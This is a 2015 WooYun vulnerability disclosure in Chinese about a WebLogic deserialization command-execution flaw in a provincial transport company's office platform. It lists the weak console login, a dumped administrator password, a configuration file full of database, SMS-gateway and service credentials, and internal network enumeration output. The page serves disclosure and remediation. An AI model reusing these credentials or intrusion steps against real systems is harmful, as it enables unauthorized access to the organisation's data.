安徽省交通控股集团有限公司办公平台存在Java反序列漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163896

漏洞标题：安徽省交通控股集团有限公司办公平台存在Java反序列漏洞

漏洞作者：路人甲

提交时间：2015-12-25 19:56

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：命令执行

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-25：细节已通知厂商并且等待厂商处理中
2015-12-29：厂商已经确认，细节仅向厂商公开
2016-01-08：细节向核心白帽子及相关领域专家公开
2016-01-18：细节向普通白帽子公开
2016-01-28：细节向实习白帽子公开
2016-02-09：细节向公众公开

简要描述：

rt、敏感数据请审核删除、

详细说明：

存在的漏洞的系统、
**.**.**.**:7001/aehg/login.jsp
安徽省交通控股集团有限公司办公平台

该目标存在 WebLogic “Java 反序列化”过程远程命令执行漏洞
**.**.**.**

执行命令、
user-ph1m3red8d\administrator

内网。

以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::54f0:e832:526d:205f%12
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**

weblogic 后台弱口令
直接部署了war
**.**.**.**:7001/console
weblogic/12345678

发现前辈的影子、
**.**.**.**:7001/Orc/web.jsp
密码居然是123

转发提权进入服务器、、拿到管理员的帐号密码
* User: Administrator
* Domain: USER-PH1M3RED8D
* Password: 123456suncn

数据库信息
E:\督办平台备份程序\swdc\swdc\WEB-INF\classes
        <driver-url>jdbc:jtds:sqlserver**.**.**.**:51433;DatabaseName=twdb</driver-url>
    <driver-class>net.sourceforge.jtds.jdbc.Driver</driver-class>
        <driver-url>jdbc:oracle:thin:@**.**.**.**:1521:SUNCN</driver-url>  
    <driver-class>oracle.jdbc.driver.OracleDriver</driver-class>
         --> 
        <driver-url>jdbc:oracle:thin:@**.**.**.**:1521:testpro</driver-url>  
    <driver-class>oracle.jdbc.driver.OracleDriver</driver-class>
        <driver-properties>
        <property name="user" value="swdc"/>
        <property name="password" value="swdc_pass"/>

安徽省交通控股集团有限公司办公平台 的程序源码、及设置信息。
D:\aehg\WEB-INF\classes
#系统TITLE   安徽省交通控股集团有限公司办公平台
#系统落款           安徽省交通控股集团有限公司　　设计制作：安徽商信信息技术有限公司
#单位名称           安徽省交通控股集团有限公司
#系统访问URL（交控集团）
ROOT_URL=http\://**.**.**.**\:7001/aehg/
#系统访问URL（现代交通）
ROOT_URLAehgToAhxdjt=**.**.**.**:8070/ahxdjt/
#系统访问URL（全椒管理处）
ROOT_URLAehgToAhqjglc=**.**.**.**:7005/ahqjglc/
#系统访问URL（驿达公司）
ROOT_URLAehgToAhydgs=**.**.**.**:7006/ahydgs/
MOBILE_ROOT_URL=http\://**.**.**.**\:7001/aehg/
MOBILE_IOS_ROOT_URL=https\://**.**.**.**/suncnoa/aehg/
#系统资源文件物理路径
PATH_ROOT_PHYSIC=D\:/aehg/WEB-INF/classes/
#程序备份路径
PATH_PROG_NAME=aehg
#程序备份路径
PATH_PROG_BACKUP=D:/backup/program/
#数据库备份路径
PATH_DB_BACKUP=D:/backup/database/
PWD_WEBSERVICE=123456
WS_MSGSVR=http\**.**.**.**\:8080/dbconsole/MsgWSPort?wsdl
#是否起用session 共享
CLUSTER_SESSIONSHARE=FALSE
#strRootId
SYSUNIT_ROOTID=13896736232109838
#经信委统一交换码：784927436
EIC_CHGCODE=784927436
#经信委窗口人员工号：
EIC_WIN_CODE=100200
## DMSimpleDataSource
DM_Driver=dm.jdbc.driver.DmDriver
DM_Url=jdbc:dm**.**.**.**:12345/frontpc
DM_User=inspur
DM_Password=inspur
WEBSERVICE_URLAehgToAhxdjt=http\://**.**.**.**\:8070/ahxdjt/services/
SERVICE_NAMEAehgToAhxdjt=AehgToAhxdjt_Service
WEBSERVICE_URLAehgToAhqjglc=http\**.**.**.**\:7005/ahqjglc/services/
SERVICE_NAMEAehgToAhqjglc=AehgToAhqjglc_Service
WEBSERVICE_URLAehgToAhydgs=http\**.**.**.**\:7006/ahydgs/services/
SERVICE_NAMEAehgToAhydgs=AehgToAhydgs_Service
WEBSERVICE_URL=http\://**.**.**.**\:7003/aehgweb/services/
WEBSERVICE_NAMESPACE=http://**.**.**.**
SERVICE_NAME=Info_Service
#单位名称           安徽省现代交通设施工程有限公司
#单位名称           安徽皖通高速公路股份有限公司全椒管理处
#单位名称           安徽省驿达高速公路服务区经营管理有限公司
UNIT_CODE=OA0030
#MAS机类型 1：华为MAS机
smsType=1
#企业代理服务器连接数据库的地址
smDatabase=**.**.**.**
#企业代理服务器连接数据库的用户名
smDbUser=sa
#企业代理服务器连接数据库的用户密码
smDbUserPass=infox1eies2sps3was4!
#企业代理服务器登陆用户名
smUser=gsjtoa
#企业代理服务器登陆用户密码
smUserPass=wtkj**fzkj
#待发送短信的源地址
smsSendAddress=106575296566
#现行使用的"业务类型,业务类型将用于运营商端对短信进行计费时使用"
smsSendType=MAH0010108
HlEpid=1
#HlUser=ahtjj
#HlUserPass=196ff70efaf6913f
#信息采编采用到内网栏目ID（获取的是各地要事栏目）
COLUMN_ID=13787086426873447
OUTER_DB_DRIVER=oracle.jdbc.driver.OracleDriver
OUTER_DB_URL=jdbc:oracle:thin:@**.**.**.**:1521:ahsxtest
OUTER_DB_USER=aehg_outportal
OUTER_DB_PWD=aehg_outportal_pass
#现代交通数据库中现代交通机构strRootId
XDJTOne_ID=14287421637397940
#交控集团数据库中现代交通机构strRootId
XDJTTwo_ID=13986664058694858
#全椒管理处数据库中全椒管理处机构strRootId
QJGLCOne_ID=14337467562916265
#交控集团数据库中全椒管理处机构strRootId
QJGLCTwo_ID=13896793235833029
#驿达公司数据库中驿达公司机构strRootId
YDGSOne_ID=14406632235353112
#交控集团数据库中驿达公司机构strRootId
YDGSTwo_ID=13986663125032295
#连接现代交通ahxdjtoa数据库
XDJT_DB_DRIVER=oracle.jdbc.driver.OracleDriver
XDJT_DB_URL=jdbc:oracle:thin:@**.**.**.**:1521:AHXDJTOA
XDJT_DB_USER=ahxdjtoa
XDJT_DB_PWD=ahxdjtoa_pass
#外网访问路径
OUTER_URL=http\://**.**.**.**\:7003/aehgweb/
#是否启动RTX
IS_RTX=true
#RTX系统的IP
RTX_IP=**.**.**.**
#RTX系统的PORT
RTX_PORT=8000
#RTX的WEBSERVICE的URL
RTX_URL=http\**.**.**.**\:8012/
#RTX地址
RTX_Address=http**.**.**.**:4000/UserWebServiceService.asmx
MAIL_DOMAIN_URL=http\**.**.**.**\:1122/aehg/upload/moa/mailAct.jsp?strUserId\=
DRIVER=oracle.jdbc.driver.OracleDriver
URL=jdbc:oracle:thin:@**.**.**.**:1521:devmain
USER=ahtjj
PASSWORD=ahtjj_pass

ok、不深不入、

服务器名称            注解
-------------------------------------------------------------------------------
\\11-PC                                                                        
\\SUNCNOA                                                                      
\\USER-PH1M3RED8D                                                              
\\WIN-QJO6IF8SKU2                                                              
\\WIN-W4WIJSOR6E5                                                              
命令成功完成。
ok、4

漏洞证明：

接口: **.**.**.** --- 0xc
  Internet 地址         物理地址              类型
  **.**.**.**           00-0c-29-35-2d-21     动态        
  **.**.**.**           00-0c-29-35-2d-21     动态        
  **.**.**.**51         00-0c-29-f0-a2-9e     动态        
  **.**.**.**53         00-0c-29-43-0c-00     动态        
  **.**.**.**55         00-0c-29-ae-20-51     动态        
  **.**.**.**57         00-0c-29-06-41-55     动态        
  **.**.**.**79         00-0c-29-c0-05-cc     动态        
  **.**.**.**         00-1c-54-31-0f-c2     动态        
  **.**.**.**         ff-ff-ff-ff-ff-ff     静态

修复方案：

最近Java反序列有点火、
修复方案请参考： **.**.**.**/vuldb/ssvid-89726

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-29 17:00

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163896

漏洞标题：安徽省交通控股集团有限公司办公平台存在Java反序列漏洞

相关厂商：安徽省交通控股集团有限公司

漏洞作者：路人甲

提交时间：2015-12-25 19:56

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：命令执行

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163896

漏洞标题：安徽省交通控股集团有限公司办公平台存在Java反序列漏洞

相关厂商：安徽省交通控股集团有限公司

漏洞作者： 路人甲

提交时间：2015-12-25 19:56

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：命令执行

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0163896"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云